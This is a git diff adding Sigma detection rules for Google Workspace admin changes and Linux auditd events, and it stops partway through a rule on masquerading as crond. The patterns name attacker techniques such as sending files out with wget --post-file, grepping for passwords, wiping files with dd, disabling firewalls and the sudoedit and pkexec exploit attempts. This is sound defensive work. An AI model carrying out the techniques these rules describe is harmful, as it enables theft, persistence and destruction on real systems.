google_workspace.admin +detection: + selection_base: + eventService: admin.googleapis.com + eventName: + - ENFORCE_STRONG_AUTHENTICATION + - ALLOW_STRONG_AUTHENTICATION + selection_eventValue: + new_value: 'false' + condition: all of selection* +falsepositives: + - MFA may be disabled and performed by a system administrator. +level: medium diff --git a/bin/main/rules/gworkspace/gworkspace_role_modified_or_deleted.yml b/bin/main/rules/gworkspace/gworkspace_role_modified_or_deleted.yml new file mode 100644 index 000000000..73f7a484a --- /dev/null +++ b/bin/main/rules/gworkspace/gworkspace_role_modified_or_deleted.yml @@ -0,0 +1,27 @@ +title: Google Workspace Role Modified or Deleted +id: 6aef64e3-60c6-4782-8db3-8448759c714e +status: test +description: Detects when an a role is modified or deleted in Google Workspace. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings +author: Austin Songer +date: 2021/08/24 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - DELETE_ROLE + - RENAME_ROLE + - UPDATE_ROLE + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/bin/main/rules/gworkspace/gworkspace_role_privilege_deleted.yml b/bin/main/rules/gworkspace/gworkspace_role_privilege_deleted.yml new file mode 100644 index 000000000..3ea2480b6 --- /dev/null +++ b/bin/main/rules/gworkspace/gworkspace_role_privilege_deleted.yml @@ -0,0 +1,24 @@ +title: Google Workspace Role Privilege Deleted +id: bf638ef7-4d2d-44bb-a1dc-a238252e6267 +status: test +description: Detects when an a role privilege is deleted in Google Workspace. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings +author: Austin Songer +date: 2021/08/24 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: REMOVE_PRIVILEGE + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/bin/main/rules/gworkspace/gworkspace_user_granted_admin_privileges.yml b/bin/main/rules/gworkspace/gworkspace_user_granted_admin_privileges.yml new file mode 100644 index 000000000..08e4b4b68 --- /dev/null +++ b/bin/main/rules/gworkspace/gworkspace_user_granted_admin_privileges.yml @@ -0,0 +1,26 @@ +title: Google Workspace User Granted Admin Privileges +id: 2d1b83e4-17c6-4896-a37b-29140b40a788 +status: test +description: Detects when an Google Workspace user is granted admin privileges. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE +author: Austin Songer +date: 2021/08/23 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1098 +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - GRANT_DELEGATED_ADMIN_PRIVILEGES + - GRANT_ADMIN_PRIVILEGE + condition: selection +falsepositives: + - Google Workspace admin role privileges, may be modified by system administrators. +level: medium diff --git a/bin/main/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml b/bin/main/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml new file mode 100644 index 000000000..adf31121e --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml @@ -0,0 +1,35 @@ +title: Edit of .bash_profile and .bashrc +id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9 +status: test +description: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell. +author: Peter Matkovski +references: + - 'MITRE Attack technique T1156; .bash_profile and .bashrc. ' +date: 2019/05/12 +modified: 2022/02/22 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name: + - '/root/.bashrc' + - '/root/.bash_profile' + - '/root/.profile' + - '/home/*/.bashrc' + - '/home/*/.bash_profile' + - '/home/*/.profile' + - '/etc/profile' + - '/etc/shells' + - '/etc/bashrc' + - '/etc/csh.cshrc' + - '/etc/csh.login' + condition: selection +falsepositives: + - Admin or User activity +level: medium +tags: + - attack.s0003 + - attack.persistence + - attack.t1546.004 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_audio_capture.yml b/bin/main/rules/linux/auditd/lnx_auditd_audio_capture.yml new file mode 100644 index 000000000..0692945f6 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_audio_capture.yml @@ -0,0 +1,27 @@ +title: Audio Capture +id: a7af2487-9c2f-42e4-9bb9-ff961f0561d5 +description: Detects attempts to record audio with arecord utility + #the actual binary that arecord is using and that has to be monitored is /usr/bin/aplay +author: 'Pawel Mazur' +status: experimental +date: 2021/09/04 +references: + - https://linux.die.net/man/1/arecord + - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa + - https://attack.mitre.org/techniques/T1123/ +logsource: + product: linux + service: auditd +detection: + selection: + type: EXECVE + a0: arecord + a1: '-vv' + a2: '-fdat' + condition: selection +tags: + - attack.collection + - attack.t1123 +falsepositives: + - Unknown +level: low diff --git a/bin/main/rules/linux/auditd/lnx_auditd_auditing_config_change.yml b/bin/main/rules/linux/auditd/lnx_auditd_auditing_config_change.yml new file mode 100644 index 000000000..71ce7553c --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_auditing_config_change.yml @@ -0,0 +1,31 @@ +title: Auditing Configuration Changes on Linux Host +id: 977ef627-4539-4875-adf4-ed8f780c4922 +status: test +description: Detect changes in auditd configuration files +author: Mikhail Larin, oscd.community +references: + - https://github.com/Neo23x0/auditd/blob/master/audit.rules + - self experience +date: 2019/10/25 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: PATH + name: + - /etc/audit/* + - /etc/libaudit.conf + - /etc/audisp/* + condition: selection +fields: + - exe + - comm + - key +falsepositives: + - Legitimate administrative activity +level: high +tags: + - attack.defense_evasion + - attack.t1562.006 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_binary_padding.yml b/bin/main/rules/linux/auditd/lnx_auditd_binary_padding.yml new file mode 100644 index 000000000..9977fa858 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_binary_padding.yml @@ -0,0 +1,30 @@ +title: 'Binary Padding' +id: c52a914f-3d8b-4b2a-bb75-b3991e75f8ba +status: test +description: 'Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.' +author: 'Igor Fits, oscd.community' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md +date: 2020/10/13 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + execve: + type: 'EXECVE' + truncate: + - 'truncate' + - '-s' + dd: + - 'dd' + - 'if=' + filter: + - 'of=' + condition: execve and (all of truncate or (all of dd and not filter)) +falsepositives: + - Legitimate script work +level: high +tags: + - attack.defense_evasion + - attack.t1027.001 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml b/bin/main/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml new file mode 100644 index 000000000..2ee302365 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml @@ -0,0 +1,29 @@ +title: Linux Capabilities Discovery +id: fe10751f-1995-40a5-aaa2-c97ccb4123fe +description: Detects attempts to discover the files with setuid/setgid capabilitiy on them. That would allow adversary to escalate their privileges. +author: 'Pawel Mazur' +status: experimental +date: 2021/11/28 +references: + - https://man7.org/linux/man-pages/man8/getcap.8.html + - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/ + - https://mn3m.info/posts/suid-vs-capabilities/ + - https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 +logsource: + product: linux + service: auditd +detection: + selection: + type: EXECVE + a0: getcap + a1: '-r' + a2: '/' + condition: selection +tags: + - attack.collection + - attack.privilege_escalation + - attack.t1123 + - attack.t1548 +falsepositives: + - Unknown +level: low diff --git a/bin/main/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml b/bin/main/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml new file mode 100644 index 000000000..09d9a55b6 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml @@ -0,0 +1,29 @@ +title: 'File Time Attribute Change' +id: b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b +status: test +description: 'Detect file time attribute change to hide new or changes to existing files.' +author: 'Igor Fits, oscd.community' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md +date: 2020/10/15 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + execve: + type: 'EXECVE' + touch: + - 'touch' + selection2: + - '-t' + - '-acmr' + - '-d' + - '-r' + condition: execve and touch and selection2 +falsepositives: + - Unknown +level: medium +tags: + - attack.defense_evasion + - attack.t1070.006 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml b/bin/main/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml new file mode 100644 index 000000000..eaceefccb --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml @@ -0,0 +1,24 @@ +title: Remove Immutable File Attribute +id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 +status: test +description: Detects removing immutable file attribute. +author: Jakob Weinzettl, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md +date: 2019/09/23 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'EXECVE' + a0|contains: 'chattr' + a1|contains: '-i' + condition: selection +falsepositives: + - Administrator interacting with immutable files (e.g. for instance backups). +level: medium +tags: + - attack.defense_evasion + - attack.t1222.002 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_clipboard_collection.yml b/bin/main/rules/linux/auditd/lnx_auditd_clipboard_collection.yml new file mode 100644 index 000000000..b973b0bb2 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_clipboard_collection.yml @@ -0,0 +1,31 @@ +title: Clipboard Collection with Xclip Tool +id: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf +description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/24 +references: + - https://attack.mitre.org/techniques/T1115/ + - https://linux.die.net/man/1/xclip + - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ +logsource: + product: linux + service: auditd +detection: + selection: + type: EXECVE + a0: xclip + a1: + - '-selection' + - '-sel' + a2: + - clipboard + - clip + a3: '-o' + condition: selection +tags: + - attack.collection + - attack.t1115 +falsepositives: + - Legitimate usage of xclip tools +level: low diff --git a/bin/main/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml b/bin/main/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml new file mode 100644 index 000000000..fb68c7a65 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml @@ -0,0 +1,32 @@ +title: Clipboard Collection of Image Data with Xclip Tool +id: f200dc3f-b219-425d-a17e-c38467364816 +description: Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +author: 'Pawel Mazur' +status: experimental +date: 2021/10/01 +references: + - https://attack.mitre.org/techniques/T1115/ + - https://linux.die.net/man/1/xclip +logsource: + product: linux + service: auditd +detection: + selection: + type: EXECVE + a0: xclip + a1: + - '-selection' + - '-sel' + a2: + - clipboard + - clip + a3: '-t' + a4|startswith: 'image/' + a5: '-o' + condition: selection +tags: + - attack.collection + - attack.t1115 +falsepositives: + - Legitimate usage of xclip tools +level: low diff --git a/bin/main/rules/linux/auditd/lnx_auditd_coinminer.yml b/bin/main/rules/linux/auditd/lnx_auditd_coinminer.yml new file mode 100644 index 000000000..5a7ec1d7a --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_coinminer.yml @@ -0,0 +1,33 @@ +title: Possible Coin Miner CPU Priority Param +id: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed +status: experimental +description: Detects command line parameter very often used with coin miners +author: Florian Roth +date: 2021/10/09 +references: + - https://xmrig.com/docs/miner/command-line-options +tags: + - attack.privilege_escalation + - attack.t1068 +logsource: + product: linux + service: auditd +detection: + cmd1: + a1|startswith: '--cpu-priority' + cmd2: + a2|startswith: '--cpu-priority' + cmd3: + a3|startswith: '--cpu-priority' + cmd4: + a4|startswith: '--cpu-priority' + cmd5: + a5|startswith: '--cpu-priority' + cmd6: + a6|startswith: '--cpu-priority' + cmd7: + a7|startswith: '--cpu-priority' + condition: 1 of cmd* +falsepositives: + - Other tools that use a --cpu-priority flag +level: critical diff --git a/bin/main/rules/linux/auditd/lnx_auditd_create_account.yml b/bin/main/rules/linux/auditd/lnx_auditd_create_account.yml new file mode 100644 index 000000000..0cc93ec67 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_create_account.yml @@ -0,0 +1,23 @@ +title: Creation Of An User Account +id: 759d0d51-bc99-4b5e-9add-8f5b2c8e7512 +status: test +description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. +author: Marie Euler +references: + - 'MITRE Attack technique T1136; Create Account ' +date: 2020/05/18 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + exe|endswith: '/useradd' + condition: selection +falsepositives: + - Admin activity +level: medium +tags: + - attack.t1136.001 + - attack.persistence diff --git a/bin/main/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/bin/main/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml new file mode 100644 index 000000000..d8a6328fa --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml @@ -0,0 +1,42 @@ +title: CVE-2021-3156 Exploitation Attempt +id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f +status: experimental +description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. | + Alternative approach might be to look for flooding of auditd logs due to bruteforcing | + required to trigger the heap-based buffer overflow. +author: Bhabesh Raj +date: 2021/02/01 +modified: 2021/09/14 +references: + - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit +tags: + - attack.privilege_escalation + - attack.t1068 + - cve.2021.3156 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'EXECVE' + a0: '/usr/bin/sudoedit' + cmd1: + a1: '-s' + cmd2: + a2: '-s' + cmd3: + a3: '-s' + cmd4: + a4: '-s' + cmd5: + a1: '\' + cmd6: + a2: '\' + cmd7: + a3: '\' + cmd8: + a4: '\' + condition: selection and (cmd1 or cmd2 or cmd3 or cmd4) and (cmd5 or cmd6 or cmd7 or cmd8) +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml b/bin/main/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml new file mode 100644 index 000000000..64268f9b0 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml @@ -0,0 +1,29 @@ +title: CVE-2021-3156 Exploitation Attempt +id: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2 +related: + - id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f + type: derived +status: experimental +description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. | + Alternative approach might be to look for flooding of auditd logs due to bruteforcing | + required to trigger the heap-based buffer overflow. +author: Bhabesh Raj +date: 2021/02/01 +modified: 2021/09/14 +references: + - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit +tags: + - attack.privilege_escalation + - attack.t1068 + - cve.2021.3156 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + exe: '/usr/bin/sudoedit' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml b/bin/main/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml new file mode 100644 index 000000000..df50b8d15 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml @@ -0,0 +1,28 @@ +title: CVE-2021-4034 Exploitation Attempt +id: 40a016ab-4f48-4eee-adde-bbf612695c53 +description: Detects exploitation attempt of vulnerability described in CVE-2021-4034. +author: 'Pawel Mazur' +status: experimental +date: 2022/01/27 +references: + - https://github.com/berdav/CVE-2021-4034 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034 + - https://access.redhat.com/security/cve/CVE-2021-4034 +logsource: + product: linux + service: auditd +detection: + proctitle: + type: PROCTITLE + proctitle: '(null)' + syscall: + type: SYSCALL + comm: pkexec + exe: '/usr/bin/pkexec' + condition: proctitle and syscall +tags: + - attack.privilege_escalation + - attack.t1068 +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/linux/auditd/lnx_auditd_data_compressed.yml b/bin/main/rules/linux/auditd/lnx_auditd_data_compressed.yml new file mode 100644 index 000000000..adb8e6e0f --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_data_compressed.yml @@ -0,0 +1,31 @@ +title: Data Compressed +id: a3b5e3e9-1b49-4119-8b8e-0344a01f21ee +status: test +description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. +author: Timur Zinniatullin, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md +date: 2019/10/21 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection1: + type: 'execve' + a0: 'zip' + selection2: + type: 'execve' + a0: 'gzip' + a1: '-f' + selection3: + type: 'execve' + a0: 'tar' + a1|contains: '-c' + condition: 1 of selection* +falsepositives: + - Legitimate use of archiving tools by legitimate user. +level: low +tags: + - attack.exfiltration + - attack.t1560.001 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml b/bin/main/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml new file mode 100644 index 000000000..77190c768 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml @@ -0,0 +1,25 @@ +title: Data Exfiltration with Wget +id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc +description: Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow. +author: 'Pawel Mazur' +status: experimental +date: 2021/11/18 +references: + - https://attack.mitre.org/tactics/TA0010/ + - https://linux.die.net/man/1/wget + - https://gtfobins.github.io/gtfobins/wget/ +logsource: + product: linux + service: auditd +detection: + selection: + type: EXECVE + a0: wget + a1|startswith: '--post-file=' + condition: selection +tags: + - attack.exfiltration + - attack.t1048.003 +falsepositives: + - Legitimate usage of wget utility to post a file +level: medium diff --git a/bin/main/rules/linux/auditd/lnx_auditd_dd_delete_file.yml b/bin/main/rules/linux/auditd/lnx_auditd_dd_delete_file.yml new file mode 100644 index 000000000..ef36926e6 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_dd_delete_file.yml @@ -0,0 +1,27 @@ +title: Overwriting the File with Dev Zero or Null +id: 37222991-11e9-4b6d-8bdf-60fbe48f753e +status: stable +description: Detects overwriting (effectively wiping/deleting) of a file. +author: Jakob Weinzettl, oscd.community +date: 2019/10/23 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md +logsource: + product: linux + service: auditd +detection: + selection: + type: 'EXECVE' + a0|contains: 'dd' + a1|contains: + - 'if=/dev/null' + - 'if=/dev/zero' + condition: selection +falsepositives: + - Appending null bytes to files. + - Legitimate overwrite of files. +level: low + +tags: + - attack.impact + - attack.t1485 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml b/bin/main/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml new file mode 100644 index 000000000..30428aa01 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml @@ -0,0 +1,27 @@ +title: Disable System Firewall +id: 53059bc0-1472-438b-956a-7508a94a91f0 +status: experimental +description: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network. +author: 'Pawel Mazur' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md + - https://attack.mitre.org/techniques/T1562/004/ + - https://firewalld.org/documentation/man-pages/firewall-cmd.html +date: 2022/01/22 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SERVICE_STOP' + unit: + - 'firewalld' + - 'iptables' + - 'ufw' + condition: selection +falsepositives: + - Admin activity +level: high +tags: + - attack.t1562.004 + - attack.defense_evasion diff --git a/bin/main/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml b/bin/main/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml new file mode 100644 index 000000000..34b0f105a --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml @@ -0,0 +1,25 @@ +title: File or Folder Permissions Change +id: 74c01ace-0152-4094-8ae2-6fd776dd43e5 +status: test +description: Detects file and folder permission changes. +author: Jakob Weinzettl, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md +date: 2019/09/23 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'EXECVE' + a0|contains: + - 'chmod' + - 'chown' + condition: selection +falsepositives: + - User interacting with files permissions (normal/daily behaviour). +level: low +tags: + - attack.defense_evasion + - attack.t1222.002 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml b/bin/main/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml new file mode 100644 index 000000000..e1877ffab --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml @@ -0,0 +1,25 @@ +title: 'Credentials In Files' +id: df3fcaea-2715-4214-99c5-0056ea59eb35 +status: test +description: 'Detecting attempts to extract passwords with grep' +author: 'Igor Fits, oscd.community' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md +date: 2020/10/15 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + execve: + type: 'EXECVE' + passwordgrep: + - 'grep' + - 'password' + condition: execve and all of passwordgrep +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1552.001 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/bin/main/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml new file mode 100644 index 000000000..16f6fc03a --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml @@ -0,0 +1,33 @@ +title: Hidden Files and Directories +id: d08722cd-3d09-449a-80b4-83ea2d9d4616 +description: Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character +author: 'Pawel Mazur' +status: experimental +date: 2021/09/06 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md + - https://attack.mitre.org/techniques/T1564/001/ +logsource: + product: linux + service: auditd +detection: + commands: + type: EXECVE + a0: + - mkdir + - touch + - vim + - nano + - vi + arguments: + - a1|contains: '/.' + - a1|startswith: '.' + - a2|contains: '/.' + - a2|startswith: '.' + condition: commands and arguments +tags: + - attack.defense_evasion + - attack.t1564.001 +falsepositives: + - Unknown +level: low diff --git a/bin/main/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml b/bin/main/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml new file mode 100644 index 000000000..673a4608f --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml @@ -0,0 +1,29 @@ +title: Steganography Hide Zip Information in Picture File +id: 45810b50-7edc-42ca-813b-bdac02fb946b +description: Detects appending of zip file to image +author: 'Pawel Mazur' +status: experimental +date: 2021/09/09 +references: + - https://attack.mitre.org/techniques/T1027/003/ + - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - Unknown +level: low +logsource: + product: linux + service: auditd +detection: + commands: + type: EXECVE + a0: cat + a1: + a1|endswith: + - '.jpg' + - '.png' + a2: + a2|endswith: '.zip' + condition: commands and a1 and a2 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml b/bin/main/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml new file mode 100644 index 000000000..4cd280f36 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml @@ -0,0 +1,35 @@ +title: Linux Keylogging with Pam.d +id: 49aae26c-450e-448b-911d-b3c13d178dfc +description: Detect attempt to enable auditing of TTY input + # -w /etc/pam.d/ -p wa -k pam - this rule will help you detect changes to the pam.d files- https://github.com/Neo23x0/auditd/blob/master/audit.rules + # - the TTY events detection asumes that you do not expect them in your environment or add filtering on those users that you configured it for +author: 'Pawel Mazur' +status: experimental +date: 2021/05/24 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md + - https://attack.mitre.org/techniques/T1003/ + - https://linux.die.net/man/8/pam_tty_audit + - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing + - https://access.redhat.com/articles/4409591#audit-record-types-2 +logsource: + product: linux + service: auditd +detection: + path_events: + type: PATH + name: + - '/etc/pam.d/system-auth' + - '/etc/pam.d/password-auth' + tty_events: + type: + - 'TTY' + - 'USER_TTY' + condition: path_events or tty_events +tags: + - attack.credential_access + - attack.t1003 + - attack.t1056.001 +falsepositives: + - Administrative work +level: high diff --git a/bin/main/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml b/bin/main/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml new file mode 100644 index 000000000..ffe1bd020 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml @@ -0,0 +1,24 @@ +title: Modification of ld.so.preload +id: 4b3cb710-5e83-4715-8c45-8b2b5b3e5751 +status: test +description: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes. +author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md + - https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html +date: 2019/10/24 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name: '/etc/ld.so.preload' + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.t1574.006 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_load_module_insmod.yml b/bin/main/rules/linux/auditd/lnx_auditd_load_module_insmod.yml new file mode 100644 index 000000000..941c1ad1d --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_load_module_insmod.yml @@ -0,0 +1,27 @@ +title: Loading of Kernel Module via Insmod +id: 106d7cbd-80ff-4985-b682-a7043e5acb72 +status: experimental +description: Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges. +author: 'Pawel Mazur' +date: 2021/11/02 +references: + - https://attack.mitre.org/techniques/T1547/006/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md + - https://linux.die.net/man/8/insmod + - https://man7.org/linux/man-pages/man8/kmod.8.html +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + comm: insmod + exe: /usr/bin/kmod + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1547.006 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_logging_config_change.yml b/bin/main/rules/linux/auditd/lnx_auditd_logging_config_change.yml new file mode 100644 index 000000000..028aac4f9 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_logging_config_change.yml @@ -0,0 +1,30 @@ +title: Logging Configuration Changes on Linux Host +id: c830f15d-6f6e-430f-8074-6f73d6807841 +status: test +description: Detect changes of syslog daemons configuration files +author: Mikhail Larin, oscd.community +references: + - self experience +date: 2019/10/25 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name: + - /etc/syslog.conf + - /etc/rsyslog.conf + - /etc/syslog-ng/syslog-ng.conf + condition: selection +fields: + - exe + - comm + - key +falsepositives: + - Legitimate administrative activity +level: high +tags: + - attack.defense_evasion + - attack.t1562.006 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_masquerading_crond.yml b/bin/main/rules/linux/auditd/lnx_auditd_masquerading_crond.yml new file mode 100644 index 000000000..ce000f173 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_masquerading_crond.yml @@ -0,0 +1,24 @@ +title: Masquerading as Linux Crond Process +id: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0 +status: test +description: Masquerading occurs when the name 